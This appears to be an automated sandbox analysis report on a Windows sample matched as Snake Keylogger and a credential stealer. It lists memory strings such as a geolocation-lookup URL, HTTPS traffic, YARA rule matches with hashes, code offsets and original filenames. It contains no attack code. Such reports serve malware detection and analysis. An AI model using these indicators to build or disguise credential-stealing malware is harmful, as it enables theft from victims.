            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33p
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            System Summary

            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_00874B00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0087D5DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02677BB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02670040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02670013
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02677BA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD8420
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD0400
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD03FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD03C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD7FE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9F00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9AB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9AC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD7BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAF01F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC190
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA6108
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAB328
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC470
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC751
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA6730
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA9858
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA4AD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FACA31
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FABBD2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FABEB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAB4F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA3570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAE540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAE52F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_05642E13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_05642E18
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2029787310.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2032585994.0000000006780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2032456578.0000000005180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.000000000387E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2033048840.00000000083F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEe vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3265021892.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeBinary or memory string: OriginalFilenamePHCd.exe: vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
